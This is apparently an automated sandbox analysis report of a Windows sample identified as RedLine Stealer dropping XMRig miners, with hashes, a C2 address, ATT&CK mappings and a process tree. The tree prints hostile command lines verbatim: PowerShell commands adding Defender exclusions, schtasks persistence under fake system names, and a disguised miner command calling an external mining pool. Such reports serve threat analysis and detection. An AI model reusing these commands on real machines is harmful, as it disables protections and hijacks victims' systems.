Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-10-2021 06:14

General

  • Target

    f4d816b13feaab16dce9b192b5ca8e6b.exe

  • Size

    366KB

  • MD5

    f4d816b13feaab16dce9b192b5ca8e6b

  • SHA1

    4a7f534721da2efb283db7ff3272fd6e2b1252ed

  • SHA256

    979489468d527202ce55a465799013a16fccfcc838d523707a016e064a0e85a1

  • SHA512

    cb53bcda4930f8c8c7202a48ff53d35e9b07b9531ff1e0338b9ac91890a5ce4bcc561cd65f88448a3204094ea02697595257d36da2b1b36a5121e2aa32142757

Malware Config

Extracted

Family

redline

C2

141.94.188.139:43059

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f4d816b13feaab16dce9b192b5ca8e6b.exe
    "C:\Users\Admin\AppData\Local\Temp\f4d816b13feaab16dce9b192b5ca8e6b.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1216
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2480
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1796
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start C:\Users\Admin\AppData\Local\Temp\sadid.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Users\Admin\AppData\Local\Temp\sadid.exe
          C:\Users\Admin\AppData\Local\Temp\sadid.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sadid.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:496
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wlc32" /tr "C:\Windows\system32\wlc32.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "wlc32" /tr "C:\Windows\system32\wlc32.exe"
                7⤵
                • Creates scheduled task(s)
                PID:2152
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Windows\system32\wlc32.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4060
              • C:\Windows\system32\wlc32.exe
                C:\Windows\system32\wlc32.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3568
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Windows\system32\wlc32.exe"
                  8⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3444
                  • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                    "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                    9⤵
                    • Executes dropped EXE
                    PID:1480
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "/sihost32"
                      10⤵
                        PID:3240
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c start C:\Users\Admin\AppData\Local\Temp\sddo.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Users\Admin\AppData\Local\Temp\sddo.exe
            C:\Users\Admin\AppData\Local\Temp\sddo.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2272
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sddo.exe"
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2728
              • C:\Windows\System32\cmd.exe
                "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:2524
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c "C:\Windows\system32\services32.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2228
                • C:\Windows\system32\services32.exe
                  C:\Windows\system32\services32.exe
                  7⤵
                  • Executes dropped EXE
                  PID:1492
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
                    8⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3244
                    • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:2032
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "/sihost32"
                        10⤵
                          PID:2304
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c start C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1968
            • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
              C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2108
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe"
                5⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3696
                • C:\Windows\System32\cmd.exe
                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services1312" /tr "C:\Windows\system32\services1312.exe"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3788
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "services1312" /tr "C:\Windows\system32\services1312.exe"
                    7⤵
                    • Creates scheduled task(s)
                    PID:3668
                • C:\Windows\System32\cmd.exe
                  "cmd" cmd /c "C:\Windows\system32\services1312.exe"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3084
                  • C:\Windows\system32\services1312.exe
                    C:\Windows\system32\services1312.exe
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1504
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services1312.exe"
                      8⤵
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2140
                      • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:712
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "/sihost64"
                          10⤵
                            PID:1968
                        • C:\Windows\System32\nslookup.exe
                          C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=46HVc4tSEL6FobVWa4QhpyNV9UCPYgZgvLrvPKz86MLScxHCYrvQY5p1UusoDZmYyJJTQsbBkTzTySGQaZjP8hXfKTpB74q --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
                          9⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1284

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Credential Access

        Credentials in Files

        2
        T1081

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        1
        T1082

        Collection

        Data from Local System

        2
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
          MD5

          84f2160705ac9a032c002f966498ef74

          SHA1

          e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

          SHA256

          7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

          SHA512

          f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          MD5

          db01a2c1c7e70b2b038edf8ad5ad9826

          SHA1

          540217c647a73bad8d8a79e3a0f3998b5abd199b

          SHA256

          413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

          SHA512

          c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          0a29defeb654152f1b6f9308b633df35

          SHA1

          8a132d41d52c129091c6fcd741b41374f7c3e77a

          SHA256

          1ae49dd4dc43ef8434c74dd5dc7dd754fc2fbb8ba93a734dc1fc20080f0d3479

          SHA512

          5345e4c84dc3f65c3cd7e55b6148145ea4d27e32d9c7db52188637bdb8b759299975cfd6189f6b394b8a8ae3c6baea8cc35ebe944afa7ba6b474f1d960745281

        • C:\Users\Admin\AppData\Local\Temp\fl.exe
          MD5

          2e33d374239a9ad923d0a94f257e0240

          SHA1

          5e87887d5deab57e8028777f992f9249d38d2c3b

          SHA256

          006d458be51a03adb2b1e38643d54b38591614ce6c53f9dd2761f1a3092b610f

          SHA512

          393f53ee823b2e2d9da362290f29dd50f9e126eddf63cbeb0b835a5b83f3579af70f0925354755e155beabf9e4d8105038056df01057ebcb79b07f63086714f5

        • C:\Users\Admin\AppData\Local\Temp\fl.exe
          MD5

          2e33d374239a9ad923d0a94f257e0240

          SHA1

          5e87887d5deab57e8028777f992f9249d38d2c3b

          SHA256

          006d458be51a03adb2b1e38643d54b38591614ce6c53f9dd2761f1a3092b610f

          SHA512

          393f53ee823b2e2d9da362290f29dd50f9e126eddf63cbeb0b835a5b83f3579af70f0925354755e155beabf9e4d8105038056df01057ebcb79b07f63086714f5

        • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
          MD5

          2a0a09ec05dfec48e9f06e0314f2e7ec

          SHA1

          2e05169669dbe64ebaef975f3f14b780b96f961c

          SHA256

          c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

          SHA512

          dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

        • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
          MD5

          2a0a09ec05dfec48e9f06e0314f2e7ec

          SHA1

          2e05169669dbe64ebaef975f3f14b780b96f961c

          SHA256

          c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

          SHA512

          dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

        • C:\Users\Admin\AppData\Local\Temp\sadid.exe
          MD5

          95570a09e9a2795b137f9fb626d59097

          SHA1

          4e7b266b358dde9d1a21bd95b14ff759905e2887

          SHA256

          5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

          SHA512

          061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

        • C:\Users\Admin\AppData\Local\Temp\sadid.exe
          MD5

          95570a09e9a2795b137f9fb626d59097

          SHA1

          4e7b266b358dde9d1a21bd95b14ff759905e2887

          SHA256

          5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

          SHA512

          061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

        • C:\Users\Admin\AppData\Local\Temp\sddo.exe
          MD5

          9bf4b7e923984e4968d312c1ea85281a

          SHA1

          d3a652480266a0b22e5459803cd53fc046e42942

          SHA256

          8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

          SHA512

          bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

        • C:\Users\Admin\AppData\Local\Temp\sddo.exe
          MD5

          9bf4b7e923984e4968d312c1ea85281a

          SHA1

          d3a652480266a0b22e5459803cd53fc046e42942

          SHA256

          8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

          SHA512

          bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

        • C:\Windows\System32\Microsoft\Libs\sihost64.exe
          MD5

          680565e1fc9e8c0e09b85e362655d97f

          SHA1

          c8db6748fb07fb3880fe52596630641d83698701

          SHA256

          e40073b36df7cdb093a4a8c3064c53274866d2263796c4d7ff06264f12ca7792

          SHA512

          ba026fd5a867acd060acba90aad64421afa10d22a9f9cc11da503f00e764a8b36574a356c2091d5b50ae97556e372ce4188eac38b5d326e034b857d9342544d3

        • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
          MD5

          899c153c1777899a3a911a392958c868

          SHA1

          936b9b5e14bf8843e768a116d9072fb99c9d750c

          SHA256

          d298b1a06b7d89cf6eb02ef9260681d99eb14077f97a8762643dae4fedf9110f

          SHA512

          28e862006e8474bb589ef23a3da20176590d6cd0ff59ee6516eb92ccc6ac2be86a786f2774c44241fb31ae3866be6ae3f6e4a8c12a8786571033f4fa16ea7bb7

        • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
          MD5

          899c153c1777899a3a911a392958c868

          SHA1

          936b9b5e14bf8843e768a116d9072fb99c9d750c

          SHA256

          d298b1a06b7d89cf6eb02ef9260681d99eb14077f97a8762643dae4fedf9110f

          SHA512

          28e862006e8474bb589ef23a3da20176590d6cd0ff59ee6516eb92ccc6ac2be86a786f2774c44241fb31ae3866be6ae3f6e4a8c12a8786571033f4fa16ea7bb7

        • C:\Windows\System32\services1312.exe
          MD5

          2a0a09ec05dfec48e9f06e0314f2e7ec

          SHA1

          2e05169669dbe64ebaef975f3f14b780b96f961c

          SHA256

          c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

          SHA512

          dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

        • C:\Windows\System32\services32.exe
          MD5

          9bf4b7e923984e4968d312c1ea85281a

          SHA1

          d3a652480266a0b22e5459803cd53fc046e42942

          SHA256

          8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

          SHA512

          bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

        • C:\Windows\System32\wlc32.exe
          MD5

          95570a09e9a2795b137f9fb626d59097

          SHA1

          4e7b266b358dde9d1a21bd95b14ff759905e2887

          SHA256

          5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

          SHA512

          061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

        • C:\Windows\system32\Microsoft\Libs\sihost64.exe
          MD5

          680565e1fc9e8c0e09b85e362655d97f

          SHA1

          c8db6748fb07fb3880fe52596630641d83698701

          SHA256

          e40073b36df7cdb093a4a8c3064c53274866d2263796c4d7ff06264f12ca7792

          SHA512

          ba026fd5a867acd060acba90aad64421afa10d22a9f9cc11da503f00e764a8b36574a356c2091d5b50ae97556e372ce4188eac38b5d326e034b857d9342544d3

        • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
          MD5

          899c153c1777899a3a911a392958c868

          SHA1

          936b9b5e14bf8843e768a116d9072fb99c9d750c

          SHA256

          d298b1a06b7d89cf6eb02ef9260681d99eb14077f97a8762643dae4fedf9110f

          SHA512

          28e862006e8474bb589ef23a3da20176590d6cd0ff59ee6516eb92ccc6ac2be86a786f2774c44241fb31ae3866be6ae3f6e4a8c12a8786571033f4fa16ea7bb7

        • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
          MD5

          899c153c1777899a3a911a392958c868

          SHA1

          936b9b5e14bf8843e768a116d9072fb99c9d750c

          SHA256

          d298b1a06b7d89cf6eb02ef9260681d99eb14077f97a8762643dae4fedf9110f

          SHA512

          28e862006e8474bb589ef23a3da20176590d6cd0ff59ee6516eb92ccc6ac2be86a786f2774c44241fb31ae3866be6ae3f6e4a8c12a8786571033f4fa16ea7bb7

        • C:\Windows\system32\services1312.exe
          MD5

          2a0a09ec05dfec48e9f06e0314f2e7ec

          SHA1

          2e05169669dbe64ebaef975f3f14b780b96f961c

          SHA256

          c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

          SHA512

          dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

        • C:\Windows\system32\services32.exe
          MD5

          9bf4b7e923984e4968d312c1ea85281a

          SHA1

          d3a652480266a0b22e5459803cd53fc046e42942

          SHA256

          8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

          SHA512

          bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

        • C:\Windows\system32\wlc32.exe
          MD5

          95570a09e9a2795b137f9fb626d59097

          SHA1

          4e7b266b358dde9d1a21bd95b14ff759905e2887

          SHA256

          5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

          SHA512

          061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

        • memory/496-666-0x0000016E248B0000-0x0000016E24AA1000-memory.dmp
          Filesize

          1.9MB

        • memory/496-668-0x0000016E3F166000-0x0000016E3F167000-memory.dmp
          Filesize

          4KB

        • memory/496-678-0x0000016E3F160000-0x0000016E3F162000-memory.dmp
          Filesize

          8KB

        • memory/496-683-0x0000016E3F163000-0x0000016E3F165000-memory.dmp
          Filesize

          8KB

        • memory/712-751-0x0000000000000000-mapping.dmp
        • memory/752-129-0x0000000007670000-0x0000000007671000-memory.dmp
          Filesize

          4KB

        • memory/752-128-0x0000000006BC0000-0x0000000006BC1000-memory.dmp
          Filesize

          4KB

        • memory/752-124-0x00000000068D0000-0x00000000068D1000-memory.dmp
          Filesize

          4KB

        • memory/752-115-0x0000000001770000-0x000000000178B000-memory.dmp
          Filesize

          108KB

        • memory/752-116-0x0000000005DB0000-0x0000000005DB1000-memory.dmp
          Filesize

          4KB

        • memory/752-117-0x0000000005790000-0x0000000005791000-memory.dmp
          Filesize

          4KB

        • memory/752-125-0x0000000006AC0000-0x0000000006AC1000-memory.dmp
          Filesize

          4KB

        • memory/752-122-0x0000000006690000-0x0000000006691000-memory.dmp
          Filesize

          4KB

        • memory/752-118-0x0000000003210000-0x0000000003211000-memory.dmp
          Filesize

          4KB

        • memory/752-126-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
          Filesize

          4KB

        • memory/752-119-0x00000000057A0000-0x00000000057A1000-memory.dmp
          Filesize

          4KB

        • memory/752-120-0x00000000055D0000-0x00000000055D1000-memory.dmp
          Filesize

          4KB

        • memory/752-121-0x0000000005610000-0x0000000005611000-memory.dmp
          Filesize

          4KB

        • memory/752-127-0x00000000077C0000-0x00000000077C1000-memory.dmp
          Filesize

          4KB

        • memory/752-114-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
          Filesize

          4KB

        • memory/752-123-0x0000000006D90000-0x0000000006D91000-memory.dmp
          Filesize

          4KB

        • memory/1164-689-0x0000000000000000-mapping.dmp
        • memory/1216-130-0x0000000000000000-mapping.dmp
        • memory/1284-770-0x000000014030F3F8-mapping.dmp
        • memory/1284-773-0x0000000140000000-0x0000000140786000-memory.dmp
          Filesize

          7.5MB

        • memory/1292-688-0x0000000000000000-mapping.dmp
        • memory/1360-135-0x0000000000000000-mapping.dmp
        • memory/1380-133-0x0000000000000000-mapping.dmp
        • memory/1480-764-0x0000000000000000-mapping.dmp
        • memory/1492-706-0x0000000000000000-mapping.dmp
        • memory/1504-700-0x0000000000000000-mapping.dmp
        • memory/1724-134-0x0000000000000000-mapping.dmp
        • memory/1796-396-0x0000000000000000-mapping.dmp
        • memory/1796-410-0x00000000044D0000-0x00000000044D1000-memory.dmp
          Filesize

          4KB

        • memory/1796-411-0x00000000044D2000-0x00000000044D3000-memory.dmp
          Filesize

          4KB

        • memory/1796-447-0x000000007EF10000-0x000000007EF11000-memory.dmp
          Filesize

          4KB

        • memory/1796-449-0x00000000044D3000-0x00000000044D4000-memory.dmp
          Filesize

          4KB

        • memory/1968-136-0x0000000000000000-mapping.dmp
        • memory/1968-803-0x0000022B35C46000-0x0000022B35C47000-memory.dmp
          Filesize

          4KB

        • memory/1968-798-0x0000022B34040000-0x0000022B34046000-memory.dmp
          Filesize

          24KB

        • memory/1968-801-0x0000022B35C43000-0x0000022B35C45000-memory.dmp
          Filesize

          8KB

        • memory/1968-800-0x0000022B35C40000-0x0000022B35C42000-memory.dmp
          Filesize

          8KB

        • memory/2032-758-0x0000000000000000-mapping.dmp
        • memory/2108-140-0x0000000000000000-mapping.dmp
        • memory/2140-737-0x000002807AD63000-0x000002807AD65000-memory.dmp
          Filesize

          8KB

        • memory/2140-739-0x000002807AD66000-0x000002807AD67000-memory.dmp
          Filesize

          4KB

        • memory/2140-733-0x000002807AD60000-0x000002807AD62000-memory.dmp
          Filesize

          8KB

        • memory/2152-692-0x0000000000000000-mapping.dmp
        • memory/2224-137-0x0000000000000000-mapping.dmp
        • memory/2228-695-0x0000000000000000-mapping.dmp
        • memory/2272-138-0x0000000000000000-mapping.dmp
        • memory/2304-802-0x000001A9F1EB0000-0x000001A9F1EB2000-memory.dmp
          Filesize

          8KB

        • memory/2304-804-0x000001A9F1EB3000-0x000001A9F1EB5000-memory.dmp
          Filesize

          8KB

        • memory/2304-799-0x000001A9F01F0000-0x000001A9F01F6000-memory.dmp
          Filesize

          24KB

        • memory/2304-806-0x000001A9F1EB6000-0x000001A9F1EB7000-memory.dmp
          Filesize

          4KB

        • memory/2480-152-0x0000000006BD2000-0x0000000006BD3000-memory.dmp
          Filesize

          4KB

        • memory/2480-179-0x0000000009280000-0x0000000009281000-memory.dmp
          Filesize

          4KB

        • memory/2480-158-0x0000000007F80000-0x0000000007F81000-memory.dmp
          Filesize

          4KB

        • memory/2480-149-0x0000000004A70000-0x0000000004A71000-memory.dmp
          Filesize

          4KB

        • memory/2480-150-0x0000000007210000-0x0000000007211000-memory.dmp
          Filesize

          4KB

        • memory/2480-151-0x0000000006BD0000-0x0000000006BD1000-memory.dmp
          Filesize

          4KB

        • memory/2480-184-0x0000000006BD3000-0x0000000006BD4000-memory.dmp
          Filesize

          4KB

        • memory/2480-181-0x0000000009510000-0x0000000009511000-memory.dmp
          Filesize

          4KB

        • memory/2480-180-0x000000007ED50000-0x000000007ED51000-memory.dmp
          Filesize

          4KB

        • memory/2480-148-0x0000000004610000-0x0000000004611000-memory.dmp
          Filesize

          4KB

        • memory/2480-174-0x0000000009020000-0x0000000009021000-memory.dmp
          Filesize

          4KB

        • memory/2480-147-0x0000000004610000-0x0000000004611000-memory.dmp
          Filesize

          4KB

        • memory/2480-160-0x0000000004610000-0x0000000004611000-memory.dmp
          Filesize

          4KB

        • memory/2480-167-0x0000000008FE0000-0x0000000009013000-memory.dmp
          Filesize

          204KB

        • memory/2480-139-0x0000000000000000-mapping.dmp
        • memory/2480-153-0x00000000071A0000-0x00000000071A1000-memory.dmp
          Filesize

          4KB

        • memory/2480-154-0x00000000078B0000-0x00000000078B1000-memory.dmp
          Filesize

          4KB

        • memory/2480-156-0x0000000007B70000-0x0000000007B71000-memory.dmp
          Filesize

          4KB

        • memory/2480-157-0x0000000007F40000-0x0000000007F41000-memory.dmp
          Filesize

          4KB

        • memory/2524-691-0x0000000000000000-mapping.dmp
        • memory/2728-672-0x000001A0021F0000-0x000001A0023E1000-memory.dmp
          Filesize

          1.9MB

        • memory/2728-686-0x000001A01CBC6000-0x000001A01CBC7000-memory.dmp
          Filesize

          4KB

        • memory/2728-679-0x000001A01CBC0000-0x000001A01CBC2000-memory.dmp
          Filesize

          8KB

        • memory/2728-684-0x000001A01CBC3000-0x000001A01CBC5000-memory.dmp
          Filesize

          8KB

        • memory/3084-693-0x0000000000000000-mapping.dmp
        • memory/3240-808-0x000002916D106000-0x000002916D107000-memory.dmp
          Filesize

          4KB

        • memory/3240-807-0x000002916D103000-0x000002916D105000-memory.dmp
          Filesize

          8KB

        • memory/3240-805-0x000002916D100000-0x000002916D102000-memory.dmp
          Filesize

          8KB

        • memory/3244-735-0x000001EAFC436000-0x000001EAFC437000-memory.dmp
          Filesize

          4KB

        • memory/3244-744-0x000001EAFC433000-0x000001EAFC435000-memory.dmp
          Filesize

          8KB

        • memory/3244-741-0x000001EAFC430000-0x000001EAFC432000-memory.dmp
          Filesize

          8KB

        • memory/3444-743-0x0000017BCCF56000-0x0000017BCCF57000-memory.dmp
          Filesize

          4KB

        • memory/3444-742-0x0000017BCCF53000-0x0000017BCCF55000-memory.dmp
          Filesize

          8KB

        • memory/3444-740-0x0000017BCCF50000-0x0000017BCCF52000-memory.dmp
          Filesize

          8KB

        • memory/3568-703-0x0000000000000000-mapping.dmp
        • memory/3668-690-0x0000000000000000-mapping.dmp
        • memory/3696-676-0x000002ECF9376000-0x000002ECF9377000-memory.dmp
          Filesize

          4KB

        • memory/3696-685-0x000002ECF9370000-0x000002ECF9372000-memory.dmp
          Filesize

          8KB

        • memory/3696-673-0x000002ECF70C0000-0x000002ECF72E0000-memory.dmp
          Filesize

          2.1MB

        • memory/3696-675-0x000002ECF9373000-0x000002ECF9375000-memory.dmp
          Filesize

          8KB

        • memory/3788-687-0x0000000000000000-mapping.dmp
        • memory/4060-696-0x0000000000000000-mapping.dmp